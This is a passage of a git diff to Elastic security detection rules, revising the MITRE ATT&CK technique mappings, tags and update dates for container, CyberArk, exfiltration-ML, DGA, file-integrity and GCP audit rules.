risk_score = 73 rule_id = "d9bfa475-270d-4b07-93cb-b1f49abe13da" severity = "high" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Tactic: Command and Control", "Tactic: Defense Evasion", "Tactic: Execution", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -86,9 +77,58 @@ process.args like ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[[rule.threat.technique.subtechnique]] +id = "T1037.004" +name = "RC Scripts" +reference = "https://attack.mitre.org/techniques/T1037/004/" [[rule.threat.technique]] id = "T1053" @@ -100,11 +140,6 @@ id = "T1053.003" name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" -[[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" @@ -124,39 +159,16 @@ reference = "https://attack.mitre.org/tactics/TA0003/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" [[rule.threat.technique.subtechnique]] -id = "T1053.003" -name = "Cron" -reference = "https://attack.mitre.org/techniques/T1053/003/" +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" - -[[rule.threat.technique.subtechnique]] -id = "T1053.003" -name = "Cron" -reference = "https://attack.mitre.org/techniques/T1053/003/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml b/rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml index eb31c917b85..03a60c061c0 100644 --- a/rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml +++ b/rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -51,16 +51,7 @@ This rule flags Linux container activity where a web server (or typical web-serv risk_score = 73 rule_id = "497a7091-0ebd-44d7-88c4-367ab4d4d852" severity = "high" -tags = [ - "Data Source: Elastic Defend for Containers", - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Command and Control", - "Resources: Investigation Guide", -] +tags = ["Tactic: Execution", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: Elastic Defend for Containers", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -237,29 +228,6 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Persistence" -id = "TA0003" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" - -[[rule.threat.technique.subtechnique]] -id = "T1505.003" -name = "Web Shell" -reference = "https://attack.mitre.org/techniques/T1505/003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -name = "Execution" -id = "TA0002" -reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -270,15 +238,38 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + [rule.threat.tactic] -name = "Command and Control" -id = "TA0011" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -name = "Application Layer Protocol" -id = "T1071" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_error_audit_event_promotion.toml b/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_error_audit_event_promotion.toml index 92c6ca0ff81..6fa3c4dc37a 100644 --- a/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_error_audit_event_promotion.toml +++ b/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_error_audit_event_promotion.toml @@ -3,7 +3,7 @@ creation_date = "2021/06/23" integration = ["cyberarkpas"] maturity = "production" promotion = true -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -48,23 +48,3 @@ event.dataset:cyberarkpas.audit and event.type:error ''' -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.toml b/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.toml index ae927878370..a57b73397a5 100644 --- a/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.toml +++ b/rules/integrations/cyberarkpas/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.toml @@ -3,7 +3,7 @@ creation_date = "2021/06/23" integration = ["cyberarkpas"] maturity = "production" promotion = true -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -51,23 +51,3 @@ event.dataset:cyberarkpas.audit and ''' -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml b/rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml index cd93d27121e..1080888e570 100644 --- a/rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml +++ b/rules/integrations/ded/exfiltration_ml_high_bytes_destination_port.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["ded", "endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -44,13 +44,7 @@ The Data Exfiltration Detection integration detects data exfiltration activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = [ - "Use Case: Data Exfiltration Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Exfiltration", - "Resources: Investigation Guide", -] +tags = ["Use Case: Data Exfiltration Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Tactic: Exfiltration", "Resources: Investigation Guide"] type = "machine_learning" note = """## Triage and analysis @@ -89,14 +83,26 @@ Machine learning models analyze network traffic to identify anomalies, such as d - Implement enhanced monitoring on the affected system and network segment to detect any further suspicious activity.""" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1571" +name = "Non-Standard Port" +reference = "https://attack.mitre.org/techniques/T1571/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1041" name = "Exfiltration Over C2 Channel" reference = "https://attack.mitre.org/techniques/T1041/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - diff --git a/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device.toml b/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device.toml index 8e885a4b26b..fc59e19bd27 100644 --- a/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device.toml +++ b/rules/integrations/ded/exfiltration_ml_high_bytes_written_to_external_device.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["ded", "endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -89,14 +89,18 @@ The detection rule leverages machine learning to identify anomalies in data tran - Consider deploying endpoint detection and response (EDR) solutions to enhance visibility and control over data movements to external devices.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1052" name = "Exfiltration Over Physical Medium" reference = "https://attack.mitre.org/techniques/T1052/" +[[rule.threat.technique.subtechnique]] +id = "T1052.001" +name = "Exfiltration over USB" +reference = "https://attack.mitre.org/techniques/T1052/001/" [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - diff --git a/rules/integrations/ded/exfiltration_ml_rare_process_writing_to_external_device.toml b/rules/integrations/ded/exfiltration_ml_rare_process_writing_to_external_device.toml index d0c800d51aa..321ed5158e3 100644 --- a/rules/integrations/ded/exfiltration_ml_rare_process_writing_to_external_device.toml +++ b/rules/integrations/ded/exfiltration_ml_rare_process_writing_to_external_device.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["ded", "endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -89,14 +89,18 @@ In modern environments, processes may write data to external devices for legitim - Update security policies and controls to prevent similar exfiltration attempts, such as restricting process permissions to write to external devices and enhancing endpoint protection measures.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1052" name = "Exfiltration Over Physical Medium" reference = "https://attack.mitre.org/techniques/T1052/" +[[rule.threat.technique.subtechnique]] +id = "T1052.001" +name = "Exfiltration over USB" +reference = "https://attack.mitre.org/techniques/T1052/001/" [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - diff --git a/rules/integrations/dga/command_and_control_ml_dga_high_sum_probability.toml b/rules/integrations/dga/command_and_control_ml_dga_high_sum_probability.toml index afcf159faef..411f171e203 100644 --- a/rules/integrations/dga/command_and_control_ml_dga_high_sum_probability.toml +++ b/rules/integrations/dga/command_and_control_ml_dga_high_sum_probability.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/14" integration = ["dga", "endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] anomaly_threshold = 70 @@ -96,14 +96,18 @@ Domain Generation Algorithms (DGAs) are used by malware to dynamically generate - Escalate to incident response team: If the threat is confirmed and widespread, escalate the incident to the organization's incident response team for further investigation and coordinated response efforts.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1568" name = "Dynamic Resolution" reference = "https://attack.mitre.org/techniques/T1568/" +[[rule.threat.technique.subtechnique]] +id = "T1568.002" +name = "Domain Generation Algorithms" +reference = "https://attack.mitre.org/techniques/T1568/002/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/integrations/fim/persistence_suspicious_file_modifications.toml b/rules/integrations/fim/persistence_suspicious_file_modifications.toml index 4ef9a45946f..98869db8820 100644 --- a/rules/integrations/fim/persistence_suspicious_file_modifications.toml +++ b/rules/integrations/fim/persistence_suspicious_file_modifications.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/03" integration = ["fim"] maturity = "production" -updated_date = "2025/12/04" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -47,17 +47,7 @@ To configure the Elastic FIM integration, follow these steps: For more details on configuring the Elastic FIM integration, you can refer to the [Elastic FIM documentation](https://docs.elastic.co/integrations/fim). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Credential Access", - "Tactic: Privilege Escalation", - "Tactic: Defense Evasion", - "Data Source: File Integrity Monitoring", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: File Integrity Monitoring", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -220,24 +210,39 @@ name = "RC Scripts" reference = "https://attack.mitre.org/techniques/T1037/004/" [[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" [[rule.threat.technique.subtechnique]] -id = "T1547.006" -name = "Kernel Modules and Extensions" -reference = "https://attack.mitre.org/techniques/T1547/006/" +id = "T1053.003" +name = "Cron" +reference = "https://attack.mitre.org/techniques/T1053/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.006" +name = "Systemd Timers" +reference = "https://attack.mitre.org/techniques/T1053/006/" [[rule.threat.technique]] -id = "T1136" -name = "Create Account" -reference = "https://attack.mitre.org/techniques/T1136/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [[rule.threat.technique.subtechnique]] -id = "T1136.001" -name = "Local Account" -reference = "https://attack.mitre.org/techniques/T1136/001/" +id = "T1098.004" +name = "SSH Authorized Keys" +reference = "https://attack.mitre.org/techniques/T1098/004/" + +[[rule.threat.technique]] +id = "T1542" +name = "Pre-OS Boot" +reference = "https://attack.mitre.org/techniques/T1542/" + +[[rule.threat.technique.subtechnique]] +id = "T1542.003" +name = "Bootkit" +reference = "https://attack.mitre.org/techniques/T1542/003/" [[rule.threat.technique]] id = "T1543" @@ -249,11 +254,46 @@ id = "T1543.002" name = "Systemd Service" reference = "https://attack.mitre.org/techniques/T1543/002/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.004" +name = "Unix Shell Configuration Modification" +reference = "https://attack.mitre.org/techniques/T1546/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.017" +name = "Udev Rules" +reference = "https://attack.mitre.org/techniques/T1546/017/" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.013" +name = "XDG Autostart Entries" +reference = "https://attack.mitre.org/techniques/T1547/013/" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.003" +name = "Pluggable Authentication Modules" +reference = "https://attack.mitre.org/techniques/T1556/003/" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" @@ -272,16 +312,6 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" - -[[rule.threat.technique.subtechnique]] -id = "T1053.003" -name = "Cron" -reference = "https://attack.mitre.org/techniques/T1053/003/" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" @@ -296,29 +326,3 @@ reference = "https://attack.mitre.org/techniques/T1548/003/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/gcp/collection_gcp_pub_sub_topic_creation.toml b/rules/integrations/gcp/collection_gcp_pub_sub_topic_creation.toml index 2f2e473a30c..f97dd000f8a 100644 --- a/rules/integrations/gcp/collection_gcp_pub_sub_topic_creation.toml +++ b/rules/integrations/gcp/collection_gcp_pub_sub_topic_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/23" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -82,16 +82,3 @@ event.dataset:gcp.audit and event.action:google.pubsub.v*.Publisher.CreateTopic ''' -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1530" -name = "Data from Cloud Storage" -reference = "https://attack.mitre.org/techniques/T1530/" - - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - diff --git a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_created.toml b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_created.toml index 6999cef9783..b7893e2fc97 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_created.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -87,14 +87,18 @@ event.dataset:gcp.audit and event.action:(*.compute.firewalls.insert or google.a [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_deleted.toml b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_deleted.toml index 6ac6b9d0085..dc90f3eb665 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_deleted.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -84,14 +84,18 @@ event.dataset:gcp.audit and event.action:(*.compute.firewalls.delete or google.a [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_modified.toml b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_modified.toml index 3afdc0d904e..8e59ea4e070 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_modified.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_firewall_rule_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -87,14 +87,18 @@ event.dataset:gcp.audit and event.action:(*.compute.firewalls.patch or google.ap [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/gcp/defense_evasion_gcp_logging_bucket_deletion.toml b/rules/integrations/gcp/defense_evasion_gcp_logging_bucket_deletion.toml index 0959ed9e33e..427c2ce5776 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_logging_bucket_deletion.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_logging_bucket_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -84,14 +84,18 @@ event.dataset:gcp.audit and event.action:google.logging.v*.ConfigServiceV*.Delet [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/gcp/defense_evasion_gcp_logging_sink_deletion.toml b/rules/integrations/gcp/defense_evasion_gcp_logging_sink_deletion.toml index 36bd43f1c07..38802e77eaa 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_logging_sink_deletion.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_logging_sink_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/18" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -81,14 +81,18 @@ event.dataset:gcp.audit and event.action:google.logging.v*.ConfigServiceV*.Delet [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml b/rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml index b232902cc6d..3f132004437 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_pub_sub_subscription_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/23" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,14 +64,7 @@ references = ["https://cloud.google.com/pubsub/docs/overview"] risk_score = 21 rule_id = "cc89312d-6f47-48e4-a87c-4977bd4633c3" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: GCP", - "Data Source: Google Cloud Platform", - "Use Case: Log Auditing", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Impact", "Data Source: GCP", "Data Source: Google Cloud Platform", "Use Case: Log Auditing", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -82,14 +75,13 @@ event.dataset:gcp.audit and event.action:google.pubsub.v*.Subscriber.DeleteSubsc [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml b/rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml index 01e2afac043..796f221eb75 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/18" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,14 +65,7 @@ references = ["https://cloud.google.com/pubsub/docs/overview"] risk_score = 21 rule_id = "3202e172-01b1-4738-a932-d024c514ba72" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: GCP", - "Data Source: Google Cloud Platform", - "Use Case: Log Auditing", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Impact", "Data Source: GCP", "Data Source: Google Cloud Platform", "Use Case: Log Auditing", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -83,14 +76,13 @@ event.dataset:gcp.audit and event.action:google.pubsub.v*.Publisher.DeleteTopic [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml b/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml index 66e67424205..ae4dd9b718b 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,14 +64,7 @@ references = ["https://cloud.google.com/storage/docs/access-control/iam-permissi risk_score = 47 rule_id = "2326d1b2-9acf-4dee-bd21-867ea7378b4d" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: GCP", - "Data Source: Google Cloud Platform", - "Use Case: Identity and Access Audit", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: GCP", "Data Source: Google 